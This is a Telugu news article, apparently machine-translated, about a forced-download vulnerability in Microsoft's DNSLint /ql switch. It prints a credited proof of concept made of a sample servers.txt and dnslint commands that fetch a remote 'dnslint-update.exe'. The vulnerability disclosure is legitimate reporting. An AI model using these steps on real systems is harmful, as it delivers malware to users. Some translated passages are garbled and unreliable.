మైక్రోసాఫ్ట్ యొక్క DNSLint యుటిలిటీ QL స్విచ్ రిమోట్ ఫైళ్ళను డౌన్‌లోడ్ చేయడానికి అనుమతించగలదు

మైక్రోసాఫ్ట్ కార్పొరేషన్

మైక్రోసాఫ్ట్ DNSLint బ్రౌజర్ ద్వారా ప్రాప్యత చేయబడుతున్న వివిధ వెబ్ సర్వర్‌లకు కేటాయించిన IP చిరునామాలకు సంబంధించిన డొమైన్ నేమ్ సిస్టమ్ (DNS) పేరు శోధన సమస్యలను నిర్ధారించడానికి యుటిలిటీ పనిచేస్తుంది. ఇది ప్రాథమిక విండోస్ ప్యాకేజీలో భాగంగా చేర్చబడలేదు కాని మైక్రోసాఫ్ట్ వెబ్‌సైట్ నుండి ఉచితంగా డౌన్‌లోడ్ చేసుకోవచ్చు. రిమోట్ యాక్సెస్ దుర్బలత్వం 7.6 (క్లిష్టమైన) గ్రేడ్ చేయబడింది సివిఎస్ఎస్ 3.0 డౌన్‌లోడ్ల ద్వారా బలవంతంగా డ్రైవ్ చేయడానికి కారణమయ్యే ఈ యుటిలిటీని ప్రభావితం చేయడానికి స్కేల్ కనుగొనబడింది.

“/ Ql” స్విచ్ ప్రకారం DNS పరీక్ష-ఫైళ్ళను అన్వయించేటప్పుడు DNSLint డొమైన్ పేర్లను సమీక్షించదు కాబట్టి ఈ దుర్బలత్వం పెరుగుతుంది. సాధారణంగా ntic హించిన డొమైన్ పేరు సమాచారానికి విరుద్ధంగా స్క్రిప్ట్ లేదా బైనరీ కోడ్‌ను కలిగి ఉన్న అటువంటి ఫైల్‌ను తుది వినియోగదారు నిర్వహిస్తే, బలవంతపు డౌన్‌లోడ్‌లను స్థాపించడం సులభం అయినప్పుడు సిస్టమ్‌ను ప్రమాదంలో పడవచ్చు. ఇది సంభవించిన సందర్భంలో, వెబ్ బ్రౌజర్ ద్వారా ప్రాప్యత చేసినప్పుడు రిమోట్ ఆదేశాలను డౌన్‌లోడ్ చేసి అమలు చేయగల హానికరమైన ఫైల్‌ను బలవంతంగా డౌన్‌లోడ్ చేయడానికి హ్యాకర్ ఒత్తిడి చేయవచ్చు. డౌన్‌లోడ్ స్థానిక సిస్టమ్ స్థానానికి సేవ్ అవుతుంది మరియు భద్రతా ప్రాప్యతను ప్రాంప్ట్ చేస్తుంది మరియు, డిస్క్ డ్రైవ్‌లో తెలిసిన ప్రదేశం నుండి ఫైల్ వచ్చిందని చూస్తే, ఎక్జిక్యూటబుల్‌ను ముందుకు తీసుకెళ్లడానికి వినియోగదారుని అనుమతించవచ్చు. హానికరమైన ఫైల్‌కు ప్రత్యేక హక్కు లభించిన తర్వాత, అది ఏదైనా ఉద్దేశించిన కోడ్‌ను రిమోట్‌గా అమలు చేస్తుంది మరియు వినియోగదారు యొక్క భద్రత మరియు గోప్యతను రాజీ చేస్తుంది.

యొక్క జాన్ పేజ్ hyp3rlinx డొమైన్ పేరుకు విరుద్ధంగా స్క్రిప్ట్ లేదా బైనరీ రిఫరెన్స్ టెక్స్ట్-ఫైల్ ఉపయోగించినప్పుడు, ఈ దుర్బలత్వాన్ని అనుకరించే భావన యొక్క రుజువును వ్రాసింది, ఈ క్రింది విధంగా అనుకోని ఫైల్ డౌన్‌లోడ్ చేయగలదని వివరిస్తుంది:

dnslint.exe / v / y / d “MALWARE-FILE” / s X.X.X.X / r “myreport”

DNSLint యుటిలిటీ సందర్భంలో, సిస్టమ్‌లో మాల్వేర్లను ప్రవేశపెట్టడానికి దుర్బలత్వాన్ని ఎలా ఉపయోగించుకోవాలో ఈ క్రిందివి చూపుతాయి.

1) రిమోట్ వెబ్ సర్వర్ రూట్‌లో “dnslint-update.exe”.
2) “servers.txt”
DNSLint
; ఇది నమూనా DNSLint ఇన్పుట్ ఫైల్
+ ఈ DNS సర్వర్ అంటారు: dns1.cp.msft.net
[dns ~ సర్వర్] X.X.X.X
, a, r; ఒక రికార్డ్
X.X.X.X, ptr, r; PTR రికార్డు
test1, cname, r; CNAME రికార్డ్
test2, mx, r; MX రికార్డ్
3) dnslint.exe / ql servers.txt

పైన పేర్కొన్న విధంగా పైన పేర్కొన్న కోడ్ సవరించబడలేదు హక్కులు ఈ కంటెంట్‌కు hyp3rlinx. ఈ దుర్బలత్వాన్ని బహిర్గతం చేస్తే, ఈ సమస్యను ఇంకా పరిష్కరించడానికి ప్యాచ్ నవీకరణ ఉన్నట్లు అనిపించదు. ఈ దుర్బలత్వానికి సివిఇ కోడ్ ఇంకా కేటాయించవలసి ఉంది మరియు ఈ విషయంపై మైక్రోసాఫ్ట్ తన అధికారిక భద్రతా బులెటిన్‌లో ఐడి చేసి వ్రాయాలి.